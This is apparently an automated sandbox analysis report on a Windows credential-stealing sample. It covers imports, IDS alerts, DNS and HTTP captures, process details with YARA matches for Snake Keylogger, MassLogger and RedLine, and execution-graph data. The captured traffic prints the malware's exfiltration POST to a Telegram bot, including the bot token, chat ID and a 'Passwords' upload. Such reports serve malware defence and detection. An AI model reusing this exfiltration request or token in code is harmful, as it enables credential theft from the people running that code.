                                                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                  GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                  ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                  OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishGreat Britain
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-01-11T09:37:03.872616+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704158.101.44.24280TCP
                                                                  2025-01-11T09:37:10.342161+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704158.101.44.24280TCP
                                                                  2025-01-11T09:37:11.035720+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549705149.154.167.220443TCP
                                                                  2025-01-11T09:37:11.456927+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549705149.154.167.220443TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 11, 2025 09:36:59.324552059 CET4970480192.168.2.5158.101.44.242
                                                                  Jan 11, 2025 09:36:59.329480886 CET8049704158.101.44.242192.168.2.5
                                                                  Jan 11, 2025 09:36:59.329595089 CET4970480192.168.2.5158.101.44.242
                                                                  Jan 11, 2025 09:36:59.329925060 CET4970480192.168.2.5158.101.44.242
                                                                  Jan 11, 2025 09:36:59.334696054 CET8049704158.101.44.242192.168.2.5
                                                                  Jan 11, 2025 09:37:01.330545902 CET8049704158.101.44.242192.168.2.5
                                                                  Jan 11, 2025 09:37:01.372632027 CET4970480192.168.2.5158.101.44.242
                                                                  Jan 11, 2025 09:37:01.666068077 CET4970480192.168.2.5158.101.44.242
                                                                  Jan 11, 2025 09:37:01.670984983 CET8049704158.101.44.242192.168.2.5
                                                                  Jan 11, 2025 09:37:03.822345018 CET8049704158.101.44.242192.168.2.5
                                                                  Jan 11, 2025 09:37:03.872616053 CET4970480192.168.2.5158.101.44.242
                                                                  Jan 11, 2025 09:37:08.962085009 CET4970480192.168.2.5158.101.44.242
                                                                  Jan 11, 2025 09:37:08.966923952 CET8049704158.101.44.242192.168.2.5
                                                                  Jan 11, 2025 09:37:10.301234007 CET8049704158.101.44.242192.168.2.5
                                                                  Jan 11, 2025 09:37:10.312890053 CET49705443192.168.2.5149.154.167.220
                                                                  Jan 11, 2025 09:37:10.312942982 CET44349705149.154.167.220192.168.2.5
                                                                  Jan 11, 2025 09:37:10.313018084 CET49705443192.168.2.5149.154.167.220
                                                                  Jan 11, 2025 09:37:10.319724083 CET49705443192.168.2.5149.154.167.220
                                                                  Jan 11, 2025 09:37:10.319758892 CET44349705149.154.167.220192.168.2.5
                                                                  Jan 11, 2025 09:37:10.342160940 CET4970480192.168.2.5158.101.44.242
                                                                  Jan 11, 2025 09:37:10.935638905 CET44349705149.154.167.220192.168.2.5
                                                                  Jan 11, 2025 09:37:10.935782909 CET49705443192.168.2.5149.154.167.220
                                                                  Jan 11, 2025 09:37:10.940459967 CET49705443192.168.2.5149.154.167.220
                                                                  Jan 11, 2025 09:37:10.940483093 CET44349705149.154.167.220192.168.2.5
                                                                  Jan 11, 2025 09:37:10.940987110 CET44349705149.154.167.220192.168.2.5
                                                                  Jan 11, 2025 09:37:10.981991053 CET49705443192.168.2.5149.154.167.220
                                                                  Jan 11, 2025 09:37:10.994802952 CET49705443192.168.2.5149.154.167.220
                                                                  Jan 11, 2025 09:37:11.035330057 CET44349705149.154.167.220192.168.2.5
                                                                  Jan 11, 2025 09:37:11.035391092 CET49705443192.168.2.5149.154.167.220
                                                                  Jan 11, 2025 09:37:11.035407066 CET44349705149.154.167.220192.168.2.5
                                                                  Jan 11, 2025 09:37:11.456964016 CET44349705149.154.167.220192.168.2.5
                                                                  Jan 11, 2025 09:37:11.457061052 CET44349705149.154.167.220192.168.2.5
                                                                  Jan 11, 2025 09:37:11.457566023 CET49705443192.168.2.5149.154.167.220
                                                                  Jan 11, 2025 09:37:11.462507010 CET49705443192.168.2.5149.154.167.220
                                                                  Jan 11, 2025 09:38:15.301323891 CET8049704158.101.44.242192.168.2.5
                                                                  Jan 11, 2025 09:38:15.301424980 CET4970480192.168.2.5158.101.44.242
                                                                  Jan 11, 2025 09:38:50.310461044 CET4970480192.168.2.5158.101.44.242
                                                                  Jan 11, 2025 09:38:50.315300941 CET8049704158.101.44.242192.168.2.5
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 11, 2025 09:36:59.310806990 CET5471253192.168.2.51.1.1.1
                                                                  Jan 11, 2025 09:36:59.317881107 CET53547121.1.1.1192.168.2.5
                                                                  Jan 11, 2025 09:37:10.304343939 CET6549253192.168.2.51.1.1.1
                                                                  Jan 11, 2025 09:37:10.312119961 CET53654921.1.1.1192.168.2.5
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 11, 2025 09:36:59.310806990 CET192.168.2.51.1.1.10xf485Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 09:37:10.304343939 CET192.168.2.51.1.1.10x8992Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 11, 2025 09:36:59.317881107 CET1.1.1.1192.168.2.50xf485No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 11, 2025 09:36:59.317881107 CET1.1.1.1192.168.2.50xf485No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 09:36:59.317881107 CET1.1.1.1192.168.2.50xf485No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 09:36:59.317881107 CET1.1.1.1192.168.2.50xf485No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 09:36:59.317881107 CET1.1.1.1192.168.2.50xf485No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 09:36:59.317881107 CET1.1.1.1192.168.2.50xf485No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 09:37:10.312119961 CET1.1.1.1192.168.2.50x8992No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                  • api.telegram.org
                                                                  • checkip.dyndns.org
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549704158.101.44.242805596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 09:36:59.329925060 CET151OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
                                                                  Jan 11, 2025 09:37:01.330545902 CET321INHTTP/1.1 200 OK
                                                                  Date: Sat, 11 Jan 2025 08:37:01 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  X-Request-ID: 48184b46219273adb2d6dba2e94bde20
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                  Jan 11, 2025 09:37:01.666068077 CET127OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Jan 11, 2025 09:37:03.822345018 CET730INHTTP/1.1 502 Bad Gateway
                                                                  Date: Sat, 11 Jan 2025 08:37:03 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 547
                                                                  Connection: keep-alive
                                                                  X-Request-ID: 07b1aed9d3f828787b37919aa9aa97f4
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Jan 11, 2025 09:37:08.962085009 CET127OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Jan 11, 2025 09:37:10.301234007 CET321INHTTP/1.1 200 OK
                                                                  Date: Sat, 11 Jan 2025 08:37:10 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  X-Request-ID: ffa6c39673e7f549ac061d2eb81674be
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549705149.154.167.2204435596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-11 08:37:10 UTC296OUTPOST /bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary================8dd31f13a4ccec0
                                                                  Host: api.telegram.org
                                                                  Content-Length: 1077
                                                                  Connection: Keep-Alive
                                                                  2025-01-11 08:37:11 UTC1077OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 31 33 61 34 63 63 65 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                  Data Ascii: --===============8dd31f13a4ccec0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                  2025-01-11 08:37:11 UTC388INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Sat, 11 Jan 2025 08:37:11 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 560
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  2025-01-11 08:37:11 UTC560INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 30 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 35 32 33 39 33 39 31 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 4f 56 41 4c 4f 47 47 45 52 44 41 4e 4e 59 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 34 33 37 30 39 32 37 32 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 49 66 65 61 6e 79 69 63 68 75 6b 77 75 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 49 66 65 61 6e 79 69 63 68 75 6b 77 75 30 30 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 38 34 36 33 31 2c
                                                                  Data Ascii: {"ok":true,"result":{"message_id":2000,"from":{"id":8152393919,"is_bot":true,"first_name":"NOVALOGGER","username":"NOVALOGGERDANNYbot"},"chat":{"id":1437092720,"first_name":"Ifeanyichukwu","username":"Ifeanyichukwu009","type":"private"},"date":1736584631,


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:03:36:55
                                                                  Start date:11/01/2025
                                                                  Path:C:\Users\user\Desktop\nfKqna8HuC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\nfKqna8HuC.exe"
                                                                  Imagebase:0x620000
                                                                  File size:1'147'392 bytes
                                                                  MD5 hash:377F17E222F90E7DBB2D75C7BA9175F3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2064042860.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:03:36:57
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\nfKqna8HuC.exe"
                                                                  Imagebase:0xa60000
                                                                  File size:45'984 bytes
                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.3301740960.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:4.1%
                                                                    Dynamic/Decrypted Code Coverage:1.4%
                                                                    Signature Coverage:5.8%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:165
                                                                    execution_graph 93193 623742 93194 62374b 93193->93194 93195 6237c8 93194->93195 93196 623769 93194->93196 93233 6237c6 93194->93233 93200 691e00 93195->93200 93201 6237ce 93195->93201 93197 623776 93196->93197 93198 62382c PostQuitMessage 93196->93198 93203 691e88 93197->93203 93204 623781 93197->93204 93225 6237b9 93198->93225 93199 6237ab DefWindowProcW 93199->93225 93248 622ff6 16 API calls 93200->93248 93205 6237d3 93201->93205 93206 6237f6 SetTimer RegisterWindowMessageW 93201->93206 93263 664ddd 60 API calls _memset 93203->93263 93210 623836 93204->93210 93211 623789 93204->93211 93207 6237da KillTimer 93205->93207 93208 691da3 93205->93208 93212 62381f CreatePopupMenu 93206->93212 93206->93225 93245 623847 Shell_NotifyIconW _memset 93207->93245 93220 691da8 93208->93220 93221 691ddc MoveWindow 93208->93221 93209 691e27 93249 63e312 335 API calls Mailbox 93209->93249 93238 63eb83 93210->93238 93216 691e6d 93211->93216 93217 623794 93211->93217 93212->93225 93216->93199 93262 65a5f3 48 API calls 93216->93262 93223 62379f 93217->93223 93224 691e58 93217->93224 93218 691e9a 93218->93199 93218->93225 93226 691dcb SetFocus 93220->93226 93227 691dac 93220->93227 93221->93225 93222 6237ed 93246 62390f DeleteObject DestroyWindow Mailbox 93222->93246 93223->93199 93250 623847 Shell_NotifyIconW _memset 93223->93250 93261 6655bd 70 API calls _memset 93224->93261 93226->93225 93227->93223 93231 691db5 93227->93231 93247 622ff6 16 API calls 93231->93247 93232 691e68 93232->93225 93233->93199 93236 691e4c 93251 624ffc 93236->93251 93239 63eb9a _memset 93238->93239 93240 63ec1c 93238->93240 93264 6251af 93239->93264 93240->93225 93242 63ec05 KillTimer SetTimer 93242->93240 93243 63ebc1 93243->93242 93244 693c7a Shell_NotifyIconW 93243->93244 93244->93242 93245->93222 93246->93225 93247->93225 93248->93209 93249->93223 93250->93236 93252 